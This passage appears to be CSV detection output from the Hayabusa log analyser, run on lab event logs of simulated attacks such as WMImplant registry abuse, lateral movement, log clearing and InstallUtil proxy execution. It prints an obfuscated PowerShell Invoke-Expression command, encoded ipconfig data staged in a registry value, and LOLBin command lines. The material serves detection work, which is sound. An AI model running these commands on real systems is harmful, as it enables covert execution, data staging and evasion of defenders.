A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 19:26:55.123 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\CrashDumpEnabled: DWORD (0x00000007) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 19:26:55.123 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\Overwrite: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 19:26:55.123 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\KernelDumpOnly: DWORD (0x00000000) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered 
Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 19:26:55.123 +09:00,fs03vuln.offsec.lan,13,medium,,CrashControl CrashDump Disabled,,../hayabusa-rules/sigma/registry_event/registy_event_crashdump_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 19:26:55.123 +09:00,fs03vuln.offsec.lan,13,medium,,CrashControl CrashDump Disabled,,../hayabusa-rules/sigma/registry_event/registy_event_crashdump_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 19:26:55.139 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\AutoReboot: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 19:26:55.139 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\DumpFile: 
87,105,110,100,111,119,115,32,73,80,32,67,111,110,102,105,103,117,114,97,116,105,111,110,13,10,13,10,32,32,32,72,111,115,116,32,78,97,109,101,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,102,115,48,51,118,117,108,110,13,10,32,32,32,80,114,105,109,97,114,121,32,68,110,115,32,83,117,102,102,105,120,32,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,111,102,102,115,101,99,46,108,97,110,13,10,32,32,32,78,111,100,101,32,84,121,112,101,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,72,121,98,114,105,100,13,10,32,32,32,73,80,32,82,111,117,116,105,110,103,32,69,110,97,98,108,101,100,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,78,111,13,10,32,32,32,87,73,78,83,32,80,114,111,120,121,32,69,110,97,98,108,101,100,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,78,111,13,10,32,32,32,68,78,83,32,83,117,102,102,105,120,32,83,101,97,114,99,104,32,76,105,115,116,46,32,46,32,46,32,46,32,46,32,46,32,58,32,111,102,102,115,101,99,46,108,97,110,13,10,13,10,69,116,104,101,114,110,101,116,32,97,100,97,112,116,101,114,32,69,116,104,101,114,110,101,116,48,58,13,10,13,10,32,32,32,67,111,110,110,101,99,116,105,111,110,45,115,112,101,99,105,102,105,99,32,68,78,83,32,83,117,102,102,105,120,32,32,46,32,58,32,13,10,32,32,32,68,101,115,99,114,105,112,116,105,111,110,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,73,110,116,101,108,40,82,41,32,56,50,53,55,52,76,32,71,105,103,97,98,105,116,32,78,101,116,119,111,114,107,32,67,111,110,110,101,99,116,105,111,110,13,10,32,32,32,80,104,121,115,105,99,97,108,32,65,100,100,114,101,115,115,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,48,48,45,53,48,45,53,54,45,57,55,45,50,66,45,55,55,13,10,32,32,32,68,72,67,80,32,69,110,97,98,108,101,100,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,78,111,13,10,32,32,32,65,117,116,111,99,111,110,102,105,103,117,114,97,116,105,111,110,32,69,110,97,98,108,101,100,32,46,32
,46,32,46,32,46,32,58,32,89,101,115,13,10,32,32,32,76,105,110,107,45,108,111,99,97,108,32,73,80,118,54,32,65,100,100,114,101,115,115,32,46,32,46,32,46,32,46,32,46,32,58,32,102,101,56,48,58,58,99,48,98,100,58,54,57,54,99,58,51,57,54,48,58,97,49,98,49,37,49,50,40,80,114,101,102,101,114,114,101,100,41,32,13,10,32,32,32,73,80,118,52,32,65,100,100,114,101,115,115,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,49,48,46,50,51,46,52,50,46,51,56,40,80,114,101,102,101,114,114,101,100,41,32,13,10,32,32,32,83,117,98,110,101,116,32,77,97,115,107,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,50,53,53,46,50,53,53,46,50,53,53,46,48,13,10,32,32,32,68,101,102,97,117,108,116,32,71,97,116,101,119,97,121,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,49,48,46,50,51,46,52,50,46,49,13,10,32,32,32,68,72,67,80,118,54,32,73,65,73,68,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,51,48,50,48,49,48,52,53,52,13,10,32,32,32,68,72,67,80,118,54,32,67,108,105,101,110,116,32,68,85,73,68,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,48,48,45,48,49,45,48,48,45,48,49,45,50,54,45,52,54,45,50,56,45,65,68,45,48,48,45,53,48,45,53,54,45,57,55,45,50,66,45,55,55,13,10,32,32,32,68,78,83,32,83,101,114,118,101,114,115,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,49,48,46,50,51,46,52,50,46,49,48,13,10,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,49,48,46,50,51,46,52,50,46,49,49,13,10,32,32,32,78,101,116,66,73,79,83,32,111,118,101,114,32,84,99,112,105,112,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,69,110,97,98,108,101,100,13,10,13,10,84,117,110,110,101,108,32,97,100,97,112,116,101,114,32,105,115,97,116,97,112,46,123,68,54,56,57,48,67,54,52,45,54,67,56,55,45,52,48,54,65,45,65,69,66,56,45,69,51,51,70,53,52,69,53,66,67,56,50,125,58,13,10,13,10,32,32,32,77,101,100,105,97,32,83,116,97,116,101,32,46,32,46
,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,77,101,100,105,97,32,100,105,115,99,111,110,110,101,99,116,101,100,13,10,32,32,32,67,111,110,110,101,99,116,105,111,110,45,115,112,101,99,105,102,105,99,32,68,78,83,32,83,117,102,102,105,120,32,32,46,32,58,32,13,10,32,32,32,68,101,115,99,114,105,112,116,105,111,110,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,77,105,99,114,111,115,111,102,116,32,73,83,65,84,65,80,32,65,100,97,112,116,101,114,13,10,32,32,32,80,104,121,115,105,99,97,108,32,65,100,100,114,101,115,115,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,48,48,45,48,48,45,48,48,45,48,48,45,48,48,45,48,48,45,48,48,45,69,48,13,10,32,32,32,68,72,67,80,32,69,110,97,98,108,101,100,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,78,111,13,10,32,32,32,65,117,116,111,99,111,110,102,105,103,117,114,97,116,105,111,110,32,69,110,97,98,108,101,100,32,46,32,46,32,46,32,46,32,58,32,89,101,115 | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 19:26:55.139 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\MiniDumpDir: %%SystemRoot%%\Minidump | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon 
Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\LogEvent: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\SendAlert: DWORD (0x00000000) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\CrashDumpEnabled: DWORD (0x00000007) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\Overwrite: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | 
PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\KernelDumpOnly: DWORD (0x00000000) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\AutoReboot: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\DumpFile: %%SystemRoot%%\MEMORY.DMP | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event 
Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\MiniDumpDir: %%SystemRoot%%\Minidump | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,CrashControl CrashDump Disabled,,../hayabusa-rules/sigma/registry_event/registy_event_crashdump_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,CrashControl CrashDump Disabled,,../hayabusa-rules/sigma/registry_event/registy_event_crashdump_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Cmd: powershell $env:I4Pzl|.(Get-C`ommand ('{1}e{0}'-f'x','i')) | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: OFFSEC\admmig | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x35d1aad | PID: 1860 | PGUID: A57649D1-3BC7-6189-091B-5D0300000000 | Hash: 
SHA1=9F1E24917EF96BBB339F4E2A226ACAFD1009F47B,MD5=C031E215B8B08C752BF362F6D4C5D3AD,SHA256=840E1F9DC5A29BEBF01626822D7390251E9CF05BB3560BA7B68BDB8A41CF08E3,IMPHASH=099B747A4A31983374E54912D4BB7C44",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx +2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Exec,Suspicious PowerShell Parent Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx +2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Exec,WMI Spawning Windows PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmi_spwns_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx +2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Exec,Wmiprvse Spawning Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx +2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx +2021-11-13 23:08:45.929 +09:00,FS03.offsec.lan,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: admmig | Target User: hack1 | IP Address: - | Process: | Target Server: 
cifs/fs03vuln.offsec.lan,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688-4648 Lateral movement with net use.evtx +2021-11-13 23:30:53.638 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4648,4624-Runas execution with different user.evtx" +2021-11-13 23:30:58.226 +09:00,FS03.offsec.lan,4624,info,,Logon Type 2 - Interactive,User: hack1 | Computer: FS03 | IP Addr: ::1 | LID: 0xa6f5fa4 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4648,4624-Runas execution with different user.evtx" +2021-11-13 23:30:58.226 +09:00,FS03.offsec.lan,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: admmig | Target User: hack1 | IP Address: ::1 | Process: C:\Windows\System32\svchost.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4648,4624-Runas execution with different user.evtx" +2021-11-13 23:30:58.226 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0xa6f5fa4,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4648,4624-Runas execution with different user.evtx" +2021-11-13 23:30:58.226 +09:00,FS03.offsec.lan,4624,info,,Logon Type 2 - Interactive,User: hack1 | Computer: FS03 | IP Addr: ::1 | LID: 
0xa6f5fc2 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4648,4624-Runas execution with different user.evtx" +2021-11-18 16:40:29.566 +09:00,PC-01.cybercat.local,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /nologo /target:exe /out:zoom-update.exe C:\Users\pc1-user\Desktop\zoom-update.cs | Process: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | User: CYBERCAT\pc1-user | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x678fe | PID: 2604 | PGUID: 510C1E8A-036D-6196-6801-000000000F00 | Hash: SHA1=22A72E39D307BC628093B043EF058DB1310BBF4B,MD5=28D96A80131C05E552066C798C0D8ACB,SHA256=C5270C0D8718C66382240DB538F9BACDED8DB55424768C2D942A6210B96B2720,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx +2021-11-18 16:40:29.774 +09:00,PC-01.cybercat.local,11,info,,File Created,Path: C:\Users\pc1-user\Desktop\CSCFD9BAF75EA53488BBE2F1273837CC796.TMP | Process: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | PID: 2604 | PGUID: 510C1E8A-036D-6196-6801-000000000F00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx +2021-11-18 16:40:29.795 +09:00,PC-01.cybercat.local,11,info,,File Created,Path: C:\Users\pc1-user\Desktop\zoom-update.exe | Process: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | PID: 2604 | PGUID: 
510C1E8A-036D-6196-6801-000000000F00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx +2021-11-18 16:40:29.795 +09:00,PC-01.cybercat.local,11,medium,,File Created_Sysmon Alert,"technique_id=T1047,technique_name=File System Permissions Weakness | Path: C:\Windows\Prefetch\CVTRES.EXE-BBD3ED93.pf | Process: C:\Windows\System32\svchost.exe | PID: 1128 | PGUID: 510C1E8A-EF1A-6195-1A00-000000000F00",../hayabusa-rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx +2021-11-18 16:40:29.809 +09:00,PC-01.cybercat.local,11,medium,,File Created_Sysmon Alert,"technique_id=T1047,technique_name=File System Permissions Weakness | Path: C:\Windows\Prefetch\CSC.EXE-B6D5E435.pf | Process: C:\Windows\System32\svchost.exe | PID: 1128 | PGUID: 510C1E8A-EF1A-6195-1A00-000000000F00",../hayabusa-rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx +2021-11-18 16:40:30.866 +09:00,PC-01.cybercat.local,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1543,technique_name=Service Creation | SetValue: HKLM\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-1448793622-2040000875-2550846437-1103\\Device\HarddiskVolume3\Windows\System32\dllhost.exe: Binary Data | Process: C:\Windows\system32\svchost.exe | PID: 748 | PGUID: 510C1E8A-EF18-6195-0F00-000000000F00",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx +2021-11-18 16:40:35.935 +09:00,PC-01.cybercat.local,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1543,technique_name=Service Creation | 
SetValue: HKLM\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-1448793622-2040000875-2550846437-1103\\Device\HarddiskVolume3\Windows\System32\dllhost.exe: Binary Data | Process: C:\Windows\system32\DllHost.exe | PID: 2348 | PGUID: 510C1E8A-036E-6196-6A01-000000000F00",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx +2021-11-18 16:40:46.157 +09:00,PC-01.cybercat.local,11,info,,File Created,Path: C:\Users\pc1-user\Desktop\sysmon.evtx | Process: C:\Windows\system32\mmc.exe | PID: 3116 | PGUID: 510C1E8A-FFD9-6195-4401-000000000F00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx +2021-11-18 16:40:46.404 +09:00,PC-01.cybercat.local,23,info,,Deleted File Archived,C:\Users\pc1-user\AppData\Roaming\Microsoft\Windows\Recent\sysmon.evtx.lnk | Process: C:\Windows\Explorer.EXE | User: CYBERCAT\pc1-user | PID: 3384 | PGUID: 510C1E8A-EF2F-6195-6200-000000000F00,../hayabusa-rules/hayabusa/sysmon/events/23_DeletedFileArchived.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx +2021-11-18 16:42:34.415 +09:00,PC-01.cybercat.local,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1543,technique_name=Service Creation | CreateKey: HKLM\System\CurrentControlSet\Services\ClipSVC\Parameters | Process: C:\Windows\System32\svchost.exe | PID: 5672 | PGUID: 510C1E8A-0348-6196-6701-000000000F00",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx +2021-11-18 16:42:34.416 +09:00,PC-01.cybercat.local,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1543,technique_name=Service 
Creation | CreateKey: HKLM\System\CurrentControlSet\Services\ClipSVC\Parameters | Process: C:\Windows\System32\svchost.exe | PID: 5672 | PGUID: 510C1E8A-0348-6196-6701-000000000F00",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx +2021-11-18 16:42:54.822 +09:00,PC-01.cybercat.local,1,high,,Process Created_Sysmon Alert,"technique_id=T1218.004,technique_name=InstallUtil | Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Users\pc1-user\Desktop\zoom-update.exe | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | User: CYBERCAT\pc1-user | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x678fe | PID: 816 | PGUID: 510C1E8A-03FE-6196-7101-000000000F00 | Hash: SHA1=25F66231385528D9F0E14546E2132AC486CB6955,MD5=964D5013C1EC42371AD135E02221A704,SHA256=19C86A9315EECCBB480BA6C48711EE24EA24EE97E27C1E1EEAC8B63D01A71D9F,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx +2021-11-18 16:42:54.822 +09:00,PC-01.cybercat.local,1,medium,Evas,Suspicious Execution of InstallUtil Without Log,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_instalutil.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx +2021-11-18 16:42:54.822 